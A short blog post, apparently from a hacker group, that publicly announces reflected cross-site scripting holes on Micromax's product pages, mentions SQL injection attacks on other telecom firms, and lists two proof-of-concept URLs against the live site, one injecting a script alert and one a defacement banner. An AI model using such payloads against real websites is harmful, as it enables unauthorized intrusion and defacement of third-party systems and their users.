Micromax mobile’s website xssed

Hello Friends. I was just browsing micromax’s website for their latest release, an android mobile A-60, the cheapest Android phone in the market. While browsing the site got few xss vulnerabilities. Hope they get patched soon before evil minds use them. Earlier many telecommunication giants like !dea cellular and sony ericsson etc. have been xssed and gone under sql injection attacks (check null|con for !dea sqli report)

Vulnerable links:  http://www.micromaxinfo.com/product.php?product=modu-t&cat=Touch_Screen”><script>alert(1)</script&gt;

http://www.micromaxinfo.com:80/product.php?cat=Touch_Screen&product=modu-t”><marquee><h1>XSSED(Legion Of XTRemers and Garage 4 hackers</h1></marquee>

pics:

One response to “Micromax mobile’s website xssed

  1. Pingback: Micromax Mobiles Website - LATEST MOBILE PHONES--PRICES-FEATURES – LATEST MOBILE PHONES–PRICES-FEATURES

Leave a comment